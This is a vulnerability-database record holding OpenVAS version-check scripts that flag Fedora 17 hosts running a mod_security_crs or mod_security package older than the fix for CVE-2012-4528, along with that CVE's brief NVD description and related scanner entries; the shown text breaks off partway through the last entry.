Fedora Update for mod_security_crs FEDORA-2012-18315
2012-12-04T00:00:00
ID OPENVAS:864904 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2017-12-29T00:00:00
Description
Checks the installed version of the mod_security_crs package against the fixed build named in Fedora advisory FEDORA-2012-18315.
###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for mod_security_crs FEDORA-2012-18315
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# Included ahead of the description block, so it is loaded in the metadata
# pass as well as in the actual check run.
include("revisions-lib.inc");

# Report texts; registered as script_tag values in the description block below.
tag_affected = "mod_security_crs on Fedora 17";
tag_insight = "This package provides the base rules for mod_security.";
tag_solution = "Please Install the Updated Packages.";

# Metadata pass: register identity, references and scoring for this check,
# then exit before any data about the scanned host is read.
if(description)
{
  # Identity and classification of the check.
  script_id(864904);
  script_version("$Revision: 8257 $");
  script_name("Fedora Update for mod_security_crs FEDORA-2012-18315");
  script_family("Fedora Local Security Checks");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
  script_tag(name:"last_modification", value:"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $");
  script_tag(name:"creation_date", value:"2012-12-04 09:40:19 +0530 (Tue, 04 Dec 2012)");

  # Advisory references, CVE and CVSS v2 scoring.
  script_xref(name : "URL" , value : "http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html");
  script_xref(name: "FEDORA", value: "2012-18315");
  script_cve_id("CVE-2012-4528");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:P/A:N");

  # Prerequisites: the KB keys listed here must exist before the check runs.
  # They are presumably filled by gather-package-list.nasl from a logged-in
  # SSH session - confirm against that script.
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms");

  # Text shown in the scan report.
  script_tag(name: "summary" , value: "Check for the Version of mod_security_crs");
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);

  # qod_type "package": the verdict rests on the installed RPM version alone.
  # It does not show whether the rule set is actually loaded or enforced by
  # the web server, so treat a clean result as "package is current" only.
  script_tag(name:"qod_type", value:"package");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}
# RPM comparison helpers; isrpmvuln() and __pkg_match presumably come from
# this include - confirm against pkg-lib-rpm.inc.
include("pkg-lib-rpm.inc");

# Release identifier of the scanned host, read from the scan knowledge base.
release = get_kb_item("ssh/login/release");
res = "";

# No release recorded: there is nothing to compare, so end without a verdict.
if(release == NULL)
{
  exit(0);
}

# Only Fedora 17 is covered; any other release falls through to the end of
# the script without a result.
if(release == "FC17")
{
  # Compare the installed mod_security_crs package with the fixed build
  # 2.2.6-3.fc17. A non-NULL return is the report text for a vulnerable host.
  # This looks at the rules package only: a clean result here says nothing
  # about the mod_security package itself, which the same advisory also updates.
  res = isrpmvuln(pkg:"mod_security_crs", rpm:"mod_security_crs~2.2.6~3.fc17", rls:"FC17");
  if(res != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  # Not vulnerable.
  if(__pkg_match)
  {
    exit(99);
  }

  # Presumably the package was not found in the RPM list, so no verdict is given.
  exit(0);
}
{"id": "OPENVAS:864904", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for mod_security_crs FEDORA-2012-18315", "description": "Check for the Version of mod_security_crs", "published": "2012-12-04T00:00:00", "modified": "2017-12-29T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=864904", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html", "2012-18315"], "cvelist": ["CVE-2012-4528"], "lastseen": "2018-01-02T10:58:01", "viewCount": 1, "enchantments": {"score": {"value": 6.2, "vector": "NONE", "modified": "2018-01-02T10:58:01", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2012-4528"]}, {"type": "exploitdb", "idList": ["EDB-ID:37949"]}, {"type": "nessus", "idList": ["FEDORA_2012-18315.NASL", "OPENSUSE-2013-640.NASL", "FEDORA_2012-18278.NASL", "MANDRIVA_MDVSA-2013-029.NASL", "OPENSUSE-2013-641.NASL", "MODSECURITY_2_7_0.NASL", "MANDRIVA_MDVSA-2012-182.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:831759", "OPENVAS:865688", "OPENVAS:1361412562310831759", "OPENVAS:864903", "OPENVAS:1361412562310864903", "OPENVAS:1361412562310865552", "OPENVAS:1361412562310865688", "OPENVAS:1361412562310864904", "OPENVAS:865552"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12451"]}], "modified": "2018-01-02T10:58:01", "rev": 2}, "vulnersScore": 6.2}, "pluginID": "864904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security_crs FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License 
version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mod_security_crs on Fedora 17\";\ntag_insight = \"This package provides the base rules for mod_security.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html\");\n script_id(864904);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:19 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-18315\");\n script_name(\"Fedora Update for mod_security_crs FEDORA-2012-18315\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mod_security_crs\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : 
\"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security_crs\", rpm:\"mod_security_crs~2.2.6~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:47:24", "description": "The mod_security2 module before 2.7.0 for the Apache HTTP Server allows remote attackers to bypass rules, and deliver arbitrary POST data to a PHP application, via a multipart request in which an invalid part precedes the crafted data.", "edition": 5, "cvss3": {}, "published": "2012-12-28T11:48:00", "title": "CVE-2012-4528", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4528"], "modified": "2013-11-25T04:28:00", "cpe": ["cpe:/a:modsecurity:modsecurity:2.6.1", "cpe:/a:modsecurity:modsecurity:2.1.3", "cpe:/a:modsecurity:modsecurity:2.7.0", "cpe:/a:modsecurity:modsecurity:2.1.5", "cpe:/a:modsecurity:modsecurity:2.5.7", "cpe:/a:modsecurity:modsecurity:2.1.2", "cpe:/a:modsecurity:modsecurity:2.0.1", "cpe:/a:modsecurity:modsecurity:2.5.10", "cpe:/a:modsecurity:modsecurity:2.5.13", "cpe:/a:modsecurity:modsecurity:2.6.8", "cpe:/a:modsecurity:modsecurity:2.0.0", "cpe:/a:modsecurity:modsecurity:2.5.6", "cpe:/a:modsecurity:modsecurity:2.6.4", "cpe:/a:modsecurity:modsecurity:2.5.5", "cpe:/a:modsecurity:modsecurity:2.5.11", "cpe:/a:modsecurity:modsecurity:2.1.0", "cpe:/a:modsecurity:modsecurity:2.6.7", "cpe:/a:modsecurity:modsecurity:2.5.12", "cpe:/a:modsecurity:modsecurity:2.1.6", "cpe:/a:modsecurity:modsecurity:2.6.3", "cpe:/a:modsecurity:modsecurity:2.5.4", "cpe:/a:modsecurity:modsecurity:2.1.1", "cpe:/a:modsecurity:modsecurity:2.5.1", "cpe:/a:modsecurity:modsecurity:2.0.3", "cpe:/a:modsecurity:modsecurity:2.6.0", 
"cpe:/a:modsecurity:modsecurity:2.6.2", "cpe:/a:modsecurity:modsecurity:2.0.2", "cpe:/a:modsecurity:modsecurity:2.1.4", "cpe:/a:modsecurity:modsecurity:2.5.9", "cpe:/a:modsecurity:modsecurity:2.5.8", "cpe:/a:modsecurity:modsecurity:2.5.3", "cpe:/a:modsecurity:modsecurity:2.5.2", "cpe:/a:modsecurity:modsecurity:2.0.4", "cpe:/a:modsecurity:modsecurity:2.6.5", "cpe:/a:modsecurity:modsecurity:2.5.0"], "id": "CVE-2012-4528", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4528", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:modsecurity:modsecurity:2.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.10:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.12:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.11:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.3:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:modsecurity:modsecurity:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.13:dev1:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.7.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:modsecurity:modsecurity:2.6.0:rc1:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2018-01-11T11:07:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "description": "Check for the Version of mod_security", "modified": "2018-01-09T00:00:00", "published": "2012-12-04T00:00:00", "id": "OPENVAS:864903", "href": "http://plugins.openvas.org/nasl.php?oid=864903", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2012-18315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY 
or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mod_security on Fedora 17\";\ntag_insight = \"ModSecurity is an open source intrusion detection and prevention engine\n for web applications. It operates embedded into the web server, acting\n as a powerful umbrella - shielding web applications from attacks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093619.html\");\n script_id(864903);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:17 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2012-18315\");\n script_name(\"Fedora Update for mod_security FEDORA-2012-18315\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.1~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-12-04T00:00:00", "id": "OPENVAS:1361412562310864904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864904", "type": "openvas", "title": "Fedora Update for mod_security_crs FEDORA-2012-18315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security_crs FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093620.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864904\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:19 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-18315\");\n script_name(\"Fedora Update for mod_security_crs FEDORA-2012-18315\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security_crs'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security_crs on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == 
\"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security_crs\", rpm:\"mod_security_crs~2.2.6~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:38:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-12-04T00:00:00", "id": "OPENVAS:1361412562310864903", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864903", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2012-18315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2012-18315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-December/093619.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864903\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-12-04 09:40:17 +0530 (Tue, 04 Dec 2012)\");\n script_cve_id(\"CVE-2012-4528\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2012-18315\");\n script_name(\"Fedora Update for mod_security FEDORA-2012-18315\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mod_security'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"mod_security on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res 
= isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.1~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-25T10:52:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-1915"], "description": "Check for the Version of mod_security", "modified": "2017-07-10T00:00:00", "published": "2013-04-15T00:00:00", "id": "OPENVAS:865552", "href": "http://plugins.openvas.org/nasl.php?oid=865552", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-4834", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-4834\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mod_security on Fedora 17\";\ntag_insight = \"ModSecurity is an open source intrusion detection and prevention engine\n for web applications. 
It operates embedded into the web server, acting\n as a powerful umbrella - shielding web applications from attacks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(865552);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-15 10:09:14 +0530 (Mon, 15 Apr 2013)\");\n script_cve_id(\"CVE-2012-4528\", \"CVE-2013-1915\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mod_security FEDORA-2013-4834\");\n\n script_xref(name: \"FEDORA\", value: \"2013-4834\");\n script_xref(name: \"URL\" , value: \"http://lists.fedoraproject.org/pipermail/package-announce/2013-April/101898.html\");\n script_summary(\"Check for the Version of mod_security\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mod_security\", rpm:\"mod_security~2.7.3~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:09:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-4528", "CVE-2013-2765"], "description": "Check for the Version of mod_security", "modified": "2018-01-23T00:00:00", "published": "2013-06-07T00:00:00", "id": "OPENVAS:865688", "href": "http://plugins.openvas.org/nasl.php?oid=865688", "type": "openvas", "title": "Fedora Update for mod_security FEDORA-2013-9518", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mod_security FEDORA-2013-9518\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mod_security on Fedora 17\";\ntag_insight = \"ModSecurity is an open source intrusion detection and prevention engine\n for web applications. 
